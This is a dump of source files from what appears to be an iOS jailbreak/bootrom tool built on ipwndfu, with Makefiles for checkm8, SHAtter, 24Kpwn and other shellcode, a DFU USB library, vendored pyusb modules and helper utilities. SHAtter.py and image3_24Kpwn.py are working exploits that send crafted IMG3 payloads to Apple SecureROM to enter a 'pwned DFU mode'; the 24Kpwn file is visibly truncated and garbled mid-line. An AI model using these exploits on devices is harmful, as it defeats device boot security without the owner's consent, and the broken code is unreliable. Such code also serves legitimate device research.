21 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
22 | arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
23 | rm bin/alloc8-shellcode.o
24 |
25 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
26 | arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
27 | rm bin/ibss-flash-nor-shellcode.o
28 |
29 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
30 | arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
31 | rm bin/usb_0xA1_2_armv7.o
32 |
33 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
34 | arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
35 | rm bin/checkm8_armv7.o
36 |
37 | arm64:
38 | xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
39 | gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
40 | rm bin/usb_0xA1_2_arm64.o
41 |
42 | xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
43 | gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
44 | rm bin/checkm8_arm64.o
45 |
46 | xcrun -sdk iphoneos clang src/checkm8_nopaddingcorruption_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_nopaddingcorruption_arm64.o
47 | gobjcopy -O binary -j .text bin/checkm8_nopaddingcorruption_arm64.o bin/checkm8_nopaddingcorruption_arm64.bin
48 | rm bin/checkm8_nopaddingcorruption_arm64.o
49 |
50 | xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
51 | gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
52 | rm bin/t8010_t8011_disable_wxn_arm64.o
53 |
54 | xcrun -sdk iphoneos clang src/t8015_shellcode_arm64.S -target arm64-apple-darwin -Wall -o bin/t8015_shellcode_arm64.o
55 | gobjcopy -O binary -j .text bin/t8015_shellcode_arm64.o bin/t8015_shellcode_arm64.bin
56 | rm bin/t8015_shellcode_arm64.o
57 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
6 | def generate_payload():
7 | shellcode_address = 0x8402F198 + 1
8 | data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
9 | tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
10 | header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
11 | with open('bin/SHAtter-shellcode.bin', 'rb') as f:
12 | shellcode = f.read()
13 | assert len(shellcode) <= 1024
14 | return header + tags + shellcode
15 |
16 | def exploit():
17 | print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'
18 |
19 | device = dfu.acquire_device()
20 | print 'Found:', device.serial_number
21 |
22 | if 'PWND:[' in device.serial_number:
23 | print 'Device is already in pwned DFU Mode. Not executing exploit.'
24 | return
25 |
26 | if 'CPID:8930' not in device.serial_number:
27 | print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
28 | sys.exit(1)
29 |
30 | if 'SRTG:[iBoot-574.4]' not in device.serial_number:
31 | print 'ERROR: CPID is compatible, but serial number string does not match.'
32 | print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
33 | sys.exit(1)
34 |
35 | dfu.reset_counters(device)
36 | dfu.get_data(device, 0x40)
37 | dfu.usb_reset(device)
38 | dfu.release_device(device)
39 |
40 | device = dfu.acquire_device()
41 | dfu.request_image_validation(device)
42 | dfu.release_device(device)
43 |
44 | device = dfu.acquire_device()
45 | dfu.get_data(device, 0x2C000)
46 | dfu.release_device(device)
47 |
48 | time.sleep(0.5)
49 |
50 | device = dfu.acquire_device()
51 | dfu.reset_counters(device)
52 | dfu.get_data(device, 0x140)
53 | dfu.usb_reset(device)
54 | dfu.release_device(device)
55 |
56 | device = dfu.acquire_device()
57 | dfu.request_image_validation(device)
58 | dfu.release_device(device)
59 |
60 | device = dfu.acquire_device()
61 | dfu.send_data(device, generate_payload())
62 | dfu.get_data(device, 0x2C000)
63 | dfu.release_device(device)
64 |
65 | time.sleep(0.5)
66 |
67 | device = dfu.acquire_device()
68 | failed = 'PWND:[SHAtter]' not in device.serial_number
69 | dfu.release_device(device)
70 |
71 | if failed:
72 | print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
73 | sys.exit(1)
74 |
75 | print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/checkm8_nopaddingcorruption_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/checkm8_nopaddingcorruption_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/t8015_shellcode_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/t8015_shellcode_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfuKeys/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
6 | MAX_PACKET_SIZE = 0x800
7 |
def acquire_device(timeout=5.0, match=None, fatal=True):
    """Return the first USB device with idVendor 0x5AC and idProduct 0x1227.

    The bus is scanned at least once, then re-scanned until ``timeout``
    seconds have passed. When ``match`` is given, only a device whose
    ``serial_number`` contains that substring is accepted.

    If no device is found, the process exits with status 1 when ``fatal``
    is true; otherwise ``None`` is returned.
    """
    backend = usb.backend.libusb1.get_backend(
        find_library=lambda x: libusbfinder.libusb1_path())
    began = time.time()
    while True:
        found = usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend)
        for device in found:
            if match is None or match in device.serial_number:
                return device
        time.sleep(0.001)
        # The first scan is unconditional; the deadline only gates repeats.
        if not (time.time() - began < timeout):
            break
    if not fatal:
        return None
    print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
    sys.exit(1)
25 |
def release_device(device):
    """Hand ``device`` to ``usb.util.dispose_resources`` to release its resources."""
    usb.util.dispose_resources(device)
29 |
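def reset_counters(device):
    """Issue control request 4 (bmRequestType 0x21) and require a result of 0.

    Request 4 is presumably DFU_CLRSTATUS from the USB DFU class
    specification; confirm against the device documentation.

    Raises:
        AssertionError: if ``ctrl_transfer`` returns anything other than 0.
    """
    # The transfer is made outside of an ``assert`` statement: ``python -O``
    # strips asserts together with any call made inside them, which would
    # silently turn this function into a no-op.
    status = device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000)
    if status != 0:
        raise AssertionError('unexpected ctrl_transfer result: %r' % (status,))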
33 |
def usb_reset(device):
    """Call ``device.reset()`` and ignore a ``usb.core.USBError`` it raises."""
    try:
        device.reset()
    except usb.core.USBError:
        # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
        pass
42 |
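def send_data(device, data):
    """Write ``data`` to ``device`` in chunks of at most MAX_PACKET_SIZE.

    Each chunk is sent with control request 1 and bmRequestType 0x21
    (presumably DFU_DNLOAD; confirm against the DFU class specification).

    Raises:
        AssertionError: if a transfer reports a length other than the chunk
            size that was submitted.
    """
    index = 0
    while index < len(data):
        amount = min(len(data) - index, MAX_PACKET_SIZE)
        # Keep the transfer outside of ``assert``: under ``python -O`` an
        # assert and the call inside it are removed, and nothing is sent.
        written = device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000)
        if written != amount:
            raise AssertionError('short write: %r of %r bytes' % (written, amount))
        index += amount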
50 |
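def get_data(device, amount):
    """Read ``amount`` bytes from ``device`` and return them as one string.

    Data is requested in chunks of at most MAX_PACKET_SIZE with control
    request 2 and bmRequestType 0xA1 (presumably DFU_UPLOAD; confirm
    against the DFU class specification).

    Raises:
        AssertionError: if a chunk comes back shorter or longer than
            requested.
    """
    chunks = []
    while amount > 0:
        part = min(amount, MAX_PACKET_SIZE)
        ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
        # Explicit check instead of ``assert`` so a short read is still
        # detected under ``python -O``; otherwise ``amount`` would be
        # decremented by more than was actually received.
        if len(ret) != part:
            raise AssertionError('short read: %r of %r bytes' % (len(ret), part))
        chunks.append(ret.tostring())
        amount -= part
    # Join once instead of growing a string with += on every chunk.
    return str().join(chunks)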
61 |
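def request_image_validation(device):
    """Send an empty request-1 transfer, poll request 3 three times, reset.

    The empty transfer uses bmRequestType 0x21; each poll reads 6 bytes
    with bmRequestType 0xA1 (presumably DFU_GETSTATUS; confirm against the
    DFU class specification). The poll results are not inspected. The
    port is reset afterwards through ``usb_reset``.

    Raises:
        AssertionError: if the empty transfer does not report 0.
    """
    # Made outside of ``assert`` so the transfer still happens under
    # ``python -O``, which removes assert statements entirely.
    status = device.ctrl_transfer(0x21, 1, 0, 0, '', 1000)
    if status != 0:
        raise AssertionError('unexpected ctrl_transfer result: %r' % (status,))
    for _ in range(3):
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
    usb_reset(device)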
69 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for function call tracing
def functiontrace(logger):
    """Build a decorator that traces calls to a plain function on ``logger``.

    When the module-level ``_enable_tracing`` flag is false the decorated
    function is returned unchanged. Otherwise each call is first passed to
    ``_trace_function_call`` (only if ``logger`` is effective at DEBUG or
    lower) and then forwarded to the wrapped function.

    NOTE(review): the call's positional and keyword arguments are handed to
    the tracing helper; presumably they end up in the log, so DEBUG logs may
    contain transferred buffers -- confirm before enabling in production.
    """
    def decorator_logging(f):
        if _enable_tracing:
            def do_trace(*args, **named_args):
                # Level test first, to skip string formatting when DEBUG is off.
                debug_on = logger.getEffectiveLevel() <= logging.DEBUG
                if debug_on:
                    _trace_function_call(logger, f.__name__, *args, **named_args)
                return f(*args, **named_args)
            _interop._update_wrapper(do_trace, f)
            return do_trace
        return f
    return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
# Names exported by ``from usb._interop import *``. ``_all`` and ``as_array``
# are defined in this module as well but are not listed here.
__all__ = ['_reduce', '_set', '_next', '_update_wrapper']

# we support Python >= 2.4
# NOTE(review): the version gate is an assert, so it is not evaluated when
# the interpreter runs with -O.
assert sys.hexversion >= 0x020400f0

# On Python 3, reduce became a functools module function
try:
    import functools
    _reduce = functools.reduce
except (ImportError, AttributeError):
    # No functools module, or one without reduce: use the builtin.
    _reduce = reduce

# all, introduced in Python 2.5
try:
    _all = all
except NameError:
    # No builtin all(): fold the items together with "and", starting at True.
    _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )

# we only have the builtin set type since 2.5 version
try:
    _set = set
except NameError:
    # Fall back to the old sets module.
    import sets
    _set = sets.Set
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
def _next(iter):
    """Return the next item of *iter*.

    The builtin next() is tried first; if that raises NameError the
    iterator's own next() method is called instead.
    """
    try:
        item = next(iter)
    except NameError:
        item = iter.next()
    return item
69 |
70 | # functools appeared in 2.5
try:
    import functools
    _update_wrapper = functools.update_wrapper
except (ImportError, AttributeError):
    def _update_wrapper(wrapper, wrapped):
        # Minimal stand-in used when functools.update_wrapper is missing:
        # copy the wrapped function's identifying attributes to the wrapper.
        wrapper.__name__ = wrapped.__name__
        wrapper.__module__ = wrapped.__module__
        wrapper.__doc__ = wrapped.__doc__
        # This rebinds the wrapper's __dict__ to the same dict object as the
        # wrapped function's, so the two share attribute storage afterwards.
        wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
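def as_array(data=None):
    """Return *data* as an ``array.array`` of unsigned bytes (typecode 'B').

    Args:
        data: ``None`` (gives an empty array), an existing ``array.array``
            (returned unchanged, whatever its typecode), an iterable of
            integers or a bytes-like object, or a text string.

    Returns:
        An ``array.array``; a new one except when *data* already was one.

    Raises:
        TypeError: if *data* cannot be turned into bytes.
    """
    if data is None:
        return array.array('B')

    if isinstance(data, array.array):
        return data

    try:
        return array.array('B', data)
    except TypeError:
        # When you pass a unicode string or a character sequence,
        # you get a TypeError if the first parameter does not match
        a = array.array('B')
        if hasattr(a, 'frombytes'):
            # Python >= 3.2: fromstring() is deprecated there and has been
            # removed from later Python 3 releases, so use frombytes() and
            # encode text explicitly.
            if hasattr(data, 'encode'):
                data = data.encode('utf-8')
            a.frombytes(data)
        else:
            # Python 2: frombytes() does not exist yet.
            a.fromstring(data)
        return a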
99 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookup - Lookup tables for USB
30 | """
31 |
# Numeric code -> display name.
# Presumably keyed by the descriptor type byte (bDescriptorType) -- confirm
# against the callers.
descriptors = {
    0x1 : "Device",
    0x2 : "Configuration",
    0x3 : "String",
    0x4 : "Interface",
    0x5 : "Endpoint",
    0x6 : "Device qualifier",
    0x7 : "Other speed configuration",
    0x8 : "Interface power",
    0x9 : "OTG",
    0xA : "Debug",
    0xB : "Interface association",
    0xC : "Security",
    0xD : "Key",
    0xE : "Encryption type",
    0xF : "Binary device object store (BOS)",
    0x10 : "Device capability",
    0x11 : "Wireless endpoint companion",
    0x30 : "SuperSpeed endpoint companion",
}

# Class code -> display name for device-level class codes.
# Codes that are absent from the table have no name here; callers need a
# default for unknown values.
device_classes = {
    0x0 : "Specified at interface",
    0x2 : "Communications Device",
    0x9 : "Hub",
    0xF : "Personal Healthcare Device",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFF : "Vendor-specific",
}

# Class code -> display name for interface-level class codes.
interface_classes = {
    0x0 : "Reserved",
    0x1 : "Audio",
    0x2 : "CDC Communication",
    0x3 : "Human Interface Device",
    0x5 : "Physical",
    0x6 : "Image",
    0x7 : "Printer",
    0x8 : "Mass Storage",
    0x9 : "Hub",
    0xA : "CDC Data",
    0xB : "Smart Card",
    0xD : "Content Security",
    0xE : "Video",
    0xF : "Personal Healthcare",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFE : "Application Specific",
    0xFF : "Vendor Specific",
}

# Endpoint transfer type -> display name.
# Presumably indexed by the low two bits of an endpoint's bmAttributes --
# confirm against the callers.
ep_attributes = {
    0x0 : "Control",
    0x1 : "Isochronous",
    0x2 : "Bulk",
    0x3 : "Interrupt",
}

# Milliamps per unit of a reported maximum-power value, per bus speed.
MAX_POWER_UNITS_USB2p0 = 2 # mA
MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
def apply_patches(binary, patches):
    """Return a copy of *binary* with every patch written over it.

    Args:
        binary: the sequence to patch (a byte string in this project).
        patches: iterable of ``(offset, data)`` pairs, applied in order.
            Each pair replaces ``len(data)`` items starting at ``offset``.

    Returns:
        The patched sequence, built by slicing and concatenation. No bounds
        checks are made: a patch that runs past the end makes the result
        longer than the input.
    """
    patched = binary
    for offset, replacement in patches:
        end = offset + len(replacement)
        patched = patched[:offset] + replacement + patched[end:]
    return patched
7 |
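def aes_decrypt(data, iv, key):
    """Decrypt *data* with AES-CBC (no padding) by piping it through ``openssl enc``.

    Args:
        data: ciphertext, written to openssl's stdin.
        iv: initialisation vector as a hex string (passed to ``-iv``).
        key: key as a hex string (passed to ``-K``); 32 hex digits select
            AES-128 and 64 select AES-256.

    Returns:
        Whatever openssl wrote to stdout.

    Prints an error and exits with status 1 when the key length is neither
    32 nor 64, when *iv* or *key* contains a non-hex character, when openssl
    returns a non-zero status, or when openssl writes anything to stderr.

    NOTE(review): the key and IV travel on the openssl command line, so they
    are readable in the process list by other local users for as long as the
    child runs. Treat any key handled here as exposed on a shared host.
    """
    if len(key) == 32:
        aes = 128
    elif len(key) == 64:
        aes = 256
    else:
        print('ERROR: Bad AES key given to aes_decrypt. Exiting.')
        sys.exit(1)

    # Reject anything that is not plain hex before it reaches the command
    # line. The offending value is deliberately not echoed in the message.
    hex_digits = '0123456789abcdefABCDEF'
    for value in (iv, key):
        if not all(c in hex_digits for c in value):
            print('ERROR: Non-hex IV or key given to aes_decrypt. Exiting.')
            sys.exit(1)

    # Argument list, no shell: the values are never parsed by a shell.
    p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
                         stdout=subprocess.PIPE,
                         stdin=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    (stdout, stderr) = p.communicate(input=data)

    # Any stderr output counts as a failure, warnings included.
    if p.returncode != 0 or len(stderr) > 0:
        print('ERROR: openssl failed: %s' % stderr)
        sys.exit(1)

    return stdout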
28 |
def hex_dump(data, address):
    """Return the ``xxd`` hex dump of *data*.

    *address* is converted with str() and passed to xxd's ``-o`` option.
    Prints an error and exits with status 1 if xxd returns a non-zero
    status or writes anything to stderr.
    """
    command = ['xxd', '-o', str(address)]
    proc = subprocess.Popen(command,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    dump, errors = proc.communicate(input=data)

    failed = proc.returncode != 0 or len(errors) > 0
    if failed:
        print('ERROR: xxd failed: %s' % errors)
        sys.exit(1)

    return dump
38 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/Makefile:
--------------------------------------------------------------------------------
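# Assembles the sources under src/ into raw binaries under bin/.
# Each recipe assembles to an object file, extracts a flat binary with
# objcopy, then deletes the object file.
#
# NOTE(review): the repository also carries prebuilt bin/*.bin files.
# Rebuilding from src/ and comparing the result with the shipped blob is the
# way to confirm that a blob matches its source.

# None of these targets is a file. Without .PHONY, a file or directory named
# "armv6", "armv7" or "arm64" would make the target look up to date.
.PHONY: all armv6 armv7 arm64

all: armv6 armv7 arm64

armv6:
	arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
	arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
	rm bin/steaks4uce-shellcode.o

armv7:
	arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
	arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
	rm bin/limera1n-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
	arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
	rm bin/SHAtter-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
	arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
	rm bin/24Kpwn-shellcode.o

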